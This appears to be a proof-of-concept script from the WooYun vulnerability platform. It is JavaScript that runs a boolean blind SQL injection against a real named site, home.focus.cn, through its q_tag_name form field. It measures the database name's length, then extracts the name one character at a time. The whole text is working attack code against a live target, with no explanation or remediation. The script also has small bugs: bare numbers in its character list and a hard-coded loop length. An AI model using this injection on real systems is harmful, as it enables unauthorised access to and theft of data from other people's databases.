WooYun.org

var xhr = new XMLHttpRequest();
var url = 'http://home.focus.cn/group/others/tag/group_tag_list.php';
var dbLen = 0;
for (var i=2; i<21; i++) {
    var data = 'q_tag_name=360" and length(database())=' + i + ' and "a"="a&x=19&y=9';
    xhr.open('POST', url, false);
    xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    xhr.send(data);
    if (xhr.responseText.indexOf('360') > -1) {
        dbLen = i;
        break;
    }
}
console.log('The length of DB is: ' + dbLen);

var charBox = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',0,1,2,3,4,5,6,7,8,9,'@','-','_','.'];
var xhr = new XMLHttpRequest();
var url = 'http://home.focus.cn/group/others/tag/group_tag_list.php';
var db = '';
for (var i=1; i<6; i++) {
    for (var j in charBox) {
        var data = 'q_tag_name=360" and ascii(mid(database(),'+i+',1))=' + charBox[j].charCodeAt(0) + ' and "a"="a&x=19&y=9';
        xhr.open('POST', url, false);
        xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        xhr.send(data);
        if (xhr.responseText.indexOf('360') > -1) {
            console.log(data+"\n");
            db += charBox[j];
            break;
        }
    }
}
console.log('The DB name is: ' + db);